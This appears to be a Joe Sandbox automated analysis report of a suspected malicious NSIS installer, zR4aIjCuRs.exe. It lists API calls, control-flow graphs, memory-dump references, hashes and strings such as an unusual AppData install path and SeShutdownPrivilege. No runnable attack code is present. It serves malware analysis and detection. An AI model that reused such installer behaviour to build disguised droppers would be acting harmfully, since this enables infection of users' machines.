                                  • API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                  • String ID: "C:\Users\user\Desktop\zR4aIjCuRs.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\determinationens\Wanderlustful\svageliges$C:\Users\user\AppData\Roaming\determinationens\Wanderlustful\svageliges$C:\Users\user\Desktop$Dicyanodiamide Setup$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                  • API String ID: 3441113951-3611373375
                                  • Opcode ID: 418f7ce21fe45f15723f9083b8ef212d9f55cacd26bf177e771f1ddffbd24179
                                  • Instruction ID: 34b402965a056e7880f406cddf034ee68ffb155d70387f36a3cc73b0da0a8952
                                  • Opcode Fuzzy Hash: 418f7ce21fe45f15723f9083b8ef212d9f55cacd26bf177e771f1ddffbd24179
                                  • Instruction Fuzzy Hash: FBD11571500310ABE720BF659D45B2B3AACEB4074AF10447FF881B62E1DBBD9E45876E

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 139 405461-40547c 140 405482-405549 GetDlgItem * 3 call 404266 call 404bbf GetClientRect GetSystemMetrics SendMessageW * 2 139->140 141 40560b-405612 139->141 162 405567-40556a 140->162 163 40554b-405565 SendMessageW * 2 140->163 143 405614-405636 GetDlgItem CreateThread CloseHandle 141->143 144 40563c-405649 141->144 143->144 146 405667-405671 144->146 147 40564b-405651 144->147 151 405673-405679 146->151 152 4056c7-4056cb 146->152 149 405653-405662 ShowWindow * 2 call 404266 147->149 150 40568c-405695 call 404298 147->150 149->146 159 40569a-40569e 150->159 157 4056a1-4056b1 ShowWindow 151->157 158 40567b-405687 call 40420a 151->158 152->150 155 4056cd-4056d3 152->155 155->150 164 4056d5-4056e8 SendMessageW 155->164 160 4056c1-4056c2 call 40420a 157->160 161 4056b3-4056bc call 405322 157->161 158->150 160->152 161->160 168 40557a-405591 call 404231 162->168 169 40556c-405578 SendMessageW 162->169 163->162 170 4057ea-4057ec 164->170 171 4056ee-405719 CreatePopupMenu call 4062dc AppendMenuW 164->171 178 405593-4055a7 ShowWindow 168->178 179 4055c7-4055e8 GetDlgItem SendMessageW 168->179 169->168 170->159 176 40571b-40572b GetWindowRect 171->176 177 40572e-405743 TrackPopupMenu 171->177 176->177 177->170 181 405749-405760 177->181 182 4055b6 178->182 183 4055a9-4055b4 ShowWindow 178->183 179->170 180 4055ee-405606 SendMessageW * 2 179->180 180->170 184 405765-405780 SendMessageW 181->184 185 4055bc-4055c2 call 404266 182->185 183->185 184->184 186 405782-4057a5 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 184->186 185->179 188 4057a7-4057ce SendMessageW 186->188 188->188 189 4057d0-4057e4 GlobalUnlock SetClipboardData CloseClipboard 188->189 189->170
                                  APIs
                                  • GetDlgItem.USER32(?,00000403), ref: 004054BF
                                  • GetDlgItem.USER32(?,000003EE), ref: 004054CE
                                  • GetClientRect.USER32(?,?), ref: 0040550B
                                  • GetSystemMetrics.USER32(00000002), ref: 00405512
                                  • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405533
                                  • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405544
                                  • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405557
                                  • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405565
                                  • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405578
                                  • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040559A
                                  • ShowWindow.USER32(?,00000008), ref: 004055AE
                                  • GetDlgItem.USER32(?,000003EC), ref: 004055CF
                                  • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004055DF
                                  • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004055F8
                                  • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405604
                                  • GetDlgItem.USER32(?,000003F8), ref: 004054DD
                                    • Part of subcall function 00404266: SendMessageW.USER32(00000028,?,00000001,00404091), ref: 00404274
                                  • GetDlgItem.USER32(?,000003EC), ref: 00405621
                                  • CreateThread.KERNELBASE(00000000,00000000,Function_000053F5,00000000), ref: 0040562F
                                  • CloseHandle.KERNELBASE(00000000), ref: 00405636
                                  • ShowWindow.USER32(00000000), ref: 0040565A
                                  • ShowWindow.USER32(00010462,00000008), ref: 0040565F
                                  • ShowWindow.USER32(00000008), ref: 004056A9
                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004056DD
                                  • CreatePopupMenu.USER32 ref: 004056EE
                                  • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405702
                                  • GetWindowRect.USER32(?,?), ref: 00405722
                                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040573B
                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405773
                                  • OpenClipboard.USER32(00000000), ref: 00405783
                                  • EmptyClipboard.USER32 ref: 00405789
                                  • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405795
                                  • GlobalLock.KERNEL32(00000000), ref: 0040579F
                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 004057B3
                                  • GlobalUnlock.KERNEL32(00000000), ref: 004057D3
                                  • SetClipboardData.USER32(0000000D,00000000), ref: 004057DE
                                  • CloseClipboard.USER32 ref: 004057E4
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd
                                  Similarity
                                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                  • String ID: {
                                  • API String ID: 590372296-366298937
                                  • Opcode ID: d79c0185c0728b850bacb0f939067e3749861c5126489aa4a3835004506ab0c2
                                  • Instruction ID: 0d33ea325d25f8e5d5623e6ebdd73ca6fcd7ab1b09301a5b30cdd6c49ec902ff
                                  • Opcode Fuzzy Hash: d79c0185c0728b850bacb0f939067e3749861c5126489aa4a3835004506ab0c2
                                  • Instruction Fuzzy Hash: D7B15770900608FFDB119FA0DD89AAE7BB9FB48355F00403AFA41BA1A0CB755E51DF68

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 369 404722-40474c 370 40474e-40475a call 405904 call 40654e 369->370 371 40475f-404769 369->371 370->371 373 4047d7-4047de 371->373 374 40476b-404781 GetDlgItem call 405c06 371->374 377 4047e4-4047ed 373->377 378 4048b5-4048bc 373->378 385 404793-4047cc SetWindowTextW call 404231 * 2 call 404266 call 406694 374->385 386 404783-40478b call 405c3a 374->386 381 404807-40480c 377->381 382 4047ef-4047fa 377->382 383 4048cb-4048e6 call 405904 call 405c97 378->383 384 4048be-4048c5 378->384 381->378 389 404812-404854 call 4062dc SHBrowseForFolderW 381->389 387 404800 382->387 388 404a63-404a75 call 404298 382->388 407 4048e8 383->407 408 4048ef-404907 call 4062ba call 406694 383->408 384->383 384->388 385->388 427 4047d2-4047d5 SHAutoComplete 385->427 386->385 405 40478d-40478e call 405b8f 386->405 387->381 401 404856-404870 CoTaskMemFree call 405b8f 389->401 402 4048ae 389->402 414 404872-404878 401->414 415 40489a-4048ac SetDlgItemTextW 401->415 402->378 405->385 407->408 425 404943-404954 call 4062ba call 405c3a 408->425 426 404909-40490f 408->426 414->415 418 40487a-404891 call 4062dc lstrcmpiW 414->418 415->378 418->415 429 404893-404895 lstrcatW 418->429 441 404956 425->441 442 404959-404972 GetDiskFreeSpaceW 425->442 426->425 430 404911-404923 GetDiskFreeSpaceExW 426->430 427->373 429->415 432 404925-404927 430->432 433 40499b-4049b5 430->433 436 404929 432->436 437 40492c-404941 call 405bdb 432->437 435 4049b7 433->435 439 4049bc-4049c6 call 404bbf 435->439 436->437 437->425 437->430 447 4049e1-4049ea 439->447 448 4049c8-4049cf 439->448 441->442 442->435 445 404974-404999 MulDiv 442->445 445->439 449 404a1c-404a26 447->449 450 4049ec-4049fc call 404ba7 447->450 448->447 451 4049d1 448->451 453 404a32-404a38 449->453 454 404a28-404a2f call 40140b 449->454 461 404a0e-404a17 SetDlgItemTextW 450->461 462 4049fe-404a07 call 404ade 450->462 455 4049d3-4049d8 451->455 456 4049da 451->456 459 404a3a 453->459 460 404a3d-404a4e call 404253 453->460 454->453 455->447 455->456 456->447 459->460 467 404a50-404a56 460->467 468 404a5d 460->468 461->449 469 404a0c 462->469 467->468 470 404a58 call 40467b 467->470 468->388 469->449 470->468
                                  APIs
                                  • GetDlgItem.USER32(?,000003FB), ref: 00404771
                                  • SetWindowTextW.USER32(00000000,?), ref: 0040479B
                                  • SHAutoComplete.SHLWAPI(00000000,00000001,00000007,00000000,?,00000014,?,?,00000001,?), ref: 004047D5
                                  • SHBrowseForFolderW.SHELL32(?), ref: 0040484C
                                  • CoTaskMemFree.OLE32(00000000), ref: 00404857
                                  • lstrcmpiW.KERNEL32(Space available: ,0042D248,00000000,?,?), ref: 00404889
                                  • lstrcatW.KERNEL32(?,Space available: ), ref: 00404895
                                  • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004048A7
                                    • Part of subcall function 00405904: GetDlgItemTextW.USER32(?,?,00000400,004048DE), ref: 00405917
                                    • Part of subcall function 0040654E: CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\zR4aIjCuRs.exe",0040336A,C:\Users\user\AppData\Local\Temp\,753B3420,004035D9,?,00000006,00000008,0000000A), ref: 004065B1
                                    • Part of subcall function 0040654E: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004065C0
                                    • Part of subcall function 0040654E: CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\zR4aIjCuRs.exe",0040336A,C:\Users\user\AppData\Local\Temp\,753B3420,004035D9,?,00000006,00000008,0000000A), ref: 004065C5
                                    • Part of subcall function 0040654E: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\zR4aIjCuRs.exe",0040336A,C:\Users\user\AppData\Local\Temp\,753B3420,004035D9,?,00000006,00000008,0000000A), ref: 004065D8
                                  • GetDiskFreeSpaceExW.KERNELBASE(C:\Users\user\AppData\Roaming\determinationens\Wanderlustful\svageliges,?,?,?,00000001,C:\Users\user\AppData\Roaming\determinationens\Wanderlustful\svageliges,?,?,000003FB,?), ref: 0040491E
                                  • GetDiskFreeSpaceW.KERNEL32(C:\Users\user\AppData\Roaming\determinationens\Wanderlustful\svageliges,?,?,0000040F,?,C:\Users\user\AppData\Roaming\determinationens\Wanderlustful\svageliges,C:\Users\user\AppData\Roaming\determinationens\Wanderlustful\svageliges,?,00000001,C:\Users\user\AppData\Roaming\determinationens\Wanderlustful\svageliges,?,?,000003FB,?), ref: 0040496A
                                  • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404985
                                    • Part of subcall function 00404ADE: lstrlenW.KERNEL32(0042D248,0042D248,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B7F
                                    • Part of subcall function 00404ADE: wsprintfW.USER32 ref: 00404B88
                                    • Part of subcall function 00404ADE: SetDlgItemTextW.USER32(?,0042D248), ref: 00404B9B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd
                                  Similarity
                                  • API ID: CharItemText$FreeNext$DiskSpace$AutoBrowseCompleteFolderPrevTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                  • String ID: A$C:\Users\user\AppData\Roaming\determinationens\Wanderlustful\svageliges$C:\Users\user\AppData\Roaming\determinationens\Wanderlustful\svageliges$Space available:
                                  • API String ID: 4039761011-2118535413
                                  • Opcode ID: 19144fdb0e9d5125f4be3c742e337db7ee30f83b3349ebaf1c2c387393fadd81
                                  • Instruction ID: 9ce2ccc5872d7715d19bac2dec5c0444f9ce2fea2c0a51142092d54e0f15b7c0
                                  • Opcode Fuzzy Hash: 19144fdb0e9d5125f4be3c742e337db7ee30f83b3349ebaf1c2c387393fadd81
                                  • Instruction Fuzzy Hash: F8A165B1A00208ABDB11AFA5CD45AAFB7B8EF84314F10847BF601B62D1D77C99418F6D
                                  APIs
                                  • FindFirstFileW.KERNELBASE(?,00430298,0042FA50,00405CE0,0042FA50,0042FA50,00000000,0042FA50,0042FA50,?,?,753B3420,004059EC,?,C:\Users\user\AppData\Local\Temp\,753B3420), ref: 00406608
                                  • FindClose.KERNELBASE(00000000), ref: 00406614
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd
                                  Similarity
                                  • API ID: Find$CloseFileFirst
                                  • String ID:
                                  • API String ID: 2295610775-0
                                  • Opcode ID: 09a722932e0a1bea88283b0440f714d8f88131f4b1bd488506181814d844a3ce
                                  • Instruction ID: 1ab566c2093321911261fd6ef708f8cedd572ce36bb67071c96f4f7979b88ecc
                                  • Opcode Fuzzy Hash: 09a722932e0a1bea88283b0440f714d8f88131f4b1bd488506181814d844a3ce
                                  • Instruction Fuzzy Hash: 3AD012315051205BC3401B386E0C85B7A599F55331B159F37F86AF51E0DB758C72869C

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 190 403d58-403d6a 191 403d70-403d76 190->191 192 403eab-403eba 190->192 191->192 193 403d7c-403d85 191->193 194 403f09-403f1e 192->194 195 403ebc-403f04 GetDlgItem * 2 call 404231 SetClassLongW call 40140b 192->195 198 403d87-403d94 SetWindowPos 193->198 199 403d9a-403d9d 193->199 196 403f20-403f23 194->196 197 403f5e-403f63 call 40427d 194->197 195->194 201 403f25-403f30 call 401389 196->201 202 403f56-403f58 196->202 209 403f68-403f83 197->209 198->199 204 403db7-403dbd 199->204 205 403d9f-403db1 ShowWindow 199->205 201->202 223 403f32-403f51 SendMessageW 201->223 202->197 208 4041fe 202->208 210 403dd9-403ddc 204->210 211 403dbf-403dd4 DestroyWindow 204->211 205->204 216 404200-404207 208->216 214 403f85-403f87 call 40140b 209->214 215 403f8c-403f92 209->215 219 403dde-403dea SetWindowLongW 210->219 220 403def-403df5 210->220 217 4041db-4041e1 211->217 214->215 226 403f98-403fa3 215->226 227 4041bc-4041d5 DestroyWindow EndDialog 215->227 217->208 225 4041e3-4041e9 217->225 219->216 221 403e98-403ea6 call 404298 220->221 222 403dfb-403e0c GetDlgItem 220->222 221->216 228 403e2b-403e2e 222->228 229 403e0e-403e25 SendMessageW IsWindowEnabled 222->229 223->216 225->208 231 4041eb-4041f4 ShowWindow 225->231 226->227 232 403fa9-403ff6 call 4062dc call 404231 * 3 GetDlgItem 226->232 227->217 233 403e30-403e31 228->233 234 403e33-403e36 228->234 229->208 229->228 231->208 260 404000-40403c ShowWindow KiUserCallbackDispatcher call 404253 EnableWindow 232->260 261 403ff8-403ffd 232->261 237 403e61-403e66 call 40420a 233->237 238 403e44-403e49 234->238 239 403e38-403e3e 234->239 237->221 243 403e7f-403e92 SendMessageW 238->243 244 403e4b-403e51 238->244 242 403e40-403e42 239->242 239->243 242->237 243->221 248 403e53-403e59 call 40140b 244->248 249 403e68-403e71 call 40140b 244->249 258 403e5f 248->258 249->221 257 403e73-403e7d 249->257 257->258 258->237 264 404041 260->264 265 40403e-40403f 260->265 261->260 266 404043-404071 GetSystemMenu EnableMenuItem SendMessageW 264->266 265->266 267 404073-404084 SendMessageW 266->267 268 404086 266->268 269 40408c-4040cb call 404266 call 403d39 call 4062ba lstrlenW call 4062dc SetWindowTextW call 401389 267->269 268->269 269->209 280 4040d1-4040d3 269->280 280->209 281 4040d9-4040dd 280->281 282 4040fc-404110 DestroyWindow 281->282 283 4040df-4040e5 281->283 282->217 284 404116-404143 CreateDialogParamW 282->284 283->208 285 4040eb-4040f1 283->285 284->217 286 404149-4041a0 call 404231 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 284->286 285->209 287 4040f7 285->287 286->208 292 4041a2-4041b5 ShowWindow call 40427d 286->292 287->208 294 4041ba 292->294 294->217
                                  APIs
                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403D94
                                  • ShowWindow.USER32(?), ref: 00403DB1
                                  • DestroyWindow.USER32 ref: 00403DC5
                                  • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403DE1
                                  • GetDlgItem.USER32(?,?), ref: 00403E02
                                  • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403E16
                                  • IsWindowEnabled.USER32(00000000), ref: 00403E1D
                                  • GetDlgItem.USER32(?,00000001), ref: 00403ECB
                                  • GetDlgItem.USER32(?,00000002), ref: 00403ED5
                                  • SetClassLongW.USER32(?,000000F2,?), ref: 00403EEF
                                  • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403F40
                                  • GetDlgItem.USER32(?,00000003), ref: 00403FE6
                                  • ShowWindow.USER32(00000000,?), ref: 00404007
                                  • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00404019
                                  • EnableWindow.USER32(?,?), ref: 00404034
                                  • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040404A
                                  • EnableMenuItem.USER32(00000000), ref: 00404051
                                  • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404069
                                  • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040407C
                                  • lstrlenW.KERNEL32(0042D248,?,0042D248,00000000), ref: 004040A6
                                  • SetWindowTextW.USER32(?,0042D248), ref: 004040BA
                                  • ShowWindow.USER32(?,0000000A), ref: 004041EE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd
                                  Similarity
                                  • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                  • String ID:
                                  • API String ID: 3282139019-0
                                  • Opcode ID: 7123d0eaadf85c37b7798e08e10b1c5fe4a9df0faa1dcc76925985b39ebaeda9
                                  • Instruction ID: e03fc219ec92158800d4d40d681534e4389e9639ccb8e5563fa4604b390d03ca
                                  • Opcode Fuzzy Hash: 7123d0eaadf85c37b7798e08e10b1c5fe4a9df0faa1dcc76925985b39ebaeda9
                                  • Instruction Fuzzy Hash: 29C1D171600300ABDB216F61ED89E2B3AB8FB95746F04053EF641B51F0CB799982DB6D

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 295 4039aa-4039c2 call 406694 298 4039c4-4039d4 call 406201 295->298 299 4039d6-403a0d call 406188 295->299 308 403a30-403a59 call 403c80 call 405c97 298->308 303 403a25-403a2b lstrcatW 299->303 304 403a0f-403a20 call 406188 299->304 303->308 304->303 313 403aeb-403af3 call 405c97 308->313 314 403a5f-403a64 308->314 319 403b01-403b26 LoadImageW 313->319 320 403af5-403afc call 4062dc 313->320 314->313 315 403a6a-403a92 call 406188 314->315 315->313 322 403a94-403a98 315->322 324 403ba7-403baf call 40140b 319->324 325 403b28-403b58 RegisterClassW 319->325 320->319 326 403aaa-403ab6 lstrlenW 322->326 327 403a9a-403aa7 call 405bbc 322->327 338 403bb1-403bb4 324->338 339 403bb9-403bc4 call 403c80 324->339 328 403c76 325->328 329 403b5e-403ba2 SystemParametersInfoW CreateWindowExW 325->329 333 403ab8-403ac6 lstrcmpiW 326->333 334 403ade-403ae6 call 405b8f call 4062ba 326->334 327->326 332 403c78-403c7f 328->332 329->324 333->334 337 403ac8-403ad2 GetFileAttributesW 333->337 334->313 341 403ad4-403ad6 337->341 342 403ad8-403ad9 call 405bdb 337->342 338->332 348 403bca-403be4 ShowWindow call 406624 339->348 349 403c4d-403c4e call 4053f5 339->349 341->334 341->342 342->334 354 403bf0-403c02 GetClassInfoW 348->354 355 403be6-403beb call 406624 348->355 352 403c53-403c55 349->352 356 403c57-403c5d 352->356 357 403c6f-403c71 call 40140b 352->357 360 403c04-403c14 GetClassInfoW RegisterClassW 354->360 361 403c1a-403c3d DialogBoxParamW call 40140b 354->361 355->354 356->338 362 403c63-403c6a call 40140b 356->362 357->328 360->361 365 403c42-403c4b call 4038fa 361->365 362->338 365->332
                                  APIs
                                    • Part of subcall function 00406694: GetModuleHandleA.KERNEL32(?,00000020,?,00403401,0000000A), ref: 004066A6
                                    • Part of subcall function 00406694: GetProcAddress.KERNEL32(00000000,?), ref: 004066C1
                                  • lstrcatW.KERNEL32(1033,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000,00000002,C:\Users\user\AppData\Local\Temp\,753B3420,"C:\Users\user\Desktop\zR4aIjCuRs.exe",00000000), ref: 00403A2B
                                  • lstrlenW.KERNEL32(Space available: ,?,?,?,Space available: ,00000000,C:\Users\user\AppData\Roaming\determinationens\Wanderlustful\svageliges,1033,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403AAB
                                  • lstrcmpiW.KERNEL32(?,.exe,Space available: ,?,?,?,Space available: ,00000000,C:\Users\user\AppData\Roaming\determinationens\Wanderlustful\svageliges,1033,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000), ref: 00403ABE
                                  • GetFileAttributesW.KERNEL32(Space available: ), ref: 00403AC9
                                  • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\determinationens\Wanderlustful\svageliges), ref: 00403B12
                                    • Part of subcall function 00406201: wsprintfW.USER32 ref: 0040620E
                                  • RegisterClassW.USER32(00433E80), ref: 00403B4F
                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403B67
                                  • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B9C
                                  • ShowWindow.USER32(00000005,00000000), ref: 00403BD2
